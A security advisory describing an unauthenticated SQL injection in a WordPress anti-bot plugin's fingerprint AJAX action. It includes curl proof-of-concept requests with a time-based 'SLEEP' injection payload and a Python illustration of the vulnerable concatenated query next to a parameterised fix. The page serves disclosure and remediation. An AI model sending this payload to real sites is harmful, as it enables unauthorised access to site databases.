The plugin does not properly sanitise and escape the fingerprint parameter before using it in a SQL statement in the stopbadbots_grava_fingerprint AJAX action, which is available to unauthenticated users, leading to a SQL injection.
curl -i 'https://example.com/wp-admin/admin-ajax.php' --data 'action=stopbadbots_grava_fingerprint&fingerprint=0' -H 'X-Real-IP: 1.1.1.36'
then
curl -i 'https://example.com/wp-admin/admin-ajax.php' --data 'action=stopbadbots_grava_fingerprint&fingerprint=(SELECT SLEEP(5))' -H 'X-Real-IP: 1.1.1.36'
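Why the second request's value is evaluated rather than stored, and what the fix looks like, as an added example (not the plugin's code). The table, the function names and the digits-only fingerprint format are assumptions; SQLite stands in for MySQL, with a SLEEP stub that only records that it was called.

```python
import re
import sqlite3

FINGERPRINT_RE = re.compile(r"[0-9]{1,20}")  # assumed format: decimal digits only

def make_db():
    """Constructed stand-in table; the plugin's real schema is not on the page."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE visitors (ip TEXT PRIMARY KEY, fingerprint TEXT)")
    db.execute("INSERT INTO visitors VALUES ('1.1.1.36', NULL)")
    calls = []
    # SQLite has no SLEEP(); this stub never delays, it only records that the
    # database engine evaluated the call.
    db.create_function("SLEEP", 1, lambda secs: calls.append(secs) or 0)
    return db, calls

def stored(db, ip):
    return db.execute("SELECT fingerprint FROM visitors WHERE ip = ?", (ip,)).fetchone()[0]

def save_vulnerable(db, ip, fingerprint):
    # Vulnerable pattern: the request value becomes part of the statement text,
    # so the database parses it as an SQL expression.
    db.execute("UPDATE visitors SET fingerprint = " + fingerprint + " WHERE ip = ?", (ip,))

def save_hardened(db, ip, fingerprint, strict=True):
    # Layer 1: allow-list validation rejects anything that is not a plain number.
    if strict and not FINGERPRINT_RE.fullmatch(fingerprint):
        return False
    # Layer 2: bound parameters, so the value is only ever treated as data.
    db.execute("UPDATE visitors SET fingerprint = ? WHERE ip = ?", (fingerprint, ip))
    return True

if __name__ == "__main__":
    probe = "(SELECT SLEEP(5))"  # second request body from the advisory
    db, calls = make_db()
    save_vulnerable(db, "1.1.1.36", probe)
    print("concatenated:", "SLEEP evaluated" if calls else "not evaluated")
    db, calls = make_db()
    print("validated:", save_hardened(db, "1.1.1.36", probe), calls)
    save_hardened(db, "1.1.1.36", probe, strict=False)
    print("bound only:", repr(stored(db, "1.1.1.36")), calls)
```

In WordPress code, the bound statement corresponds to building the query with `$wpdb->prepare()` and a placeholder instead of string concatenation.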
cydave
cydave
Yes
2022-03-16 (about 3 months ago)
2022-03-16 (about 3 months ago)
2022-04-09 (about 2 months ago)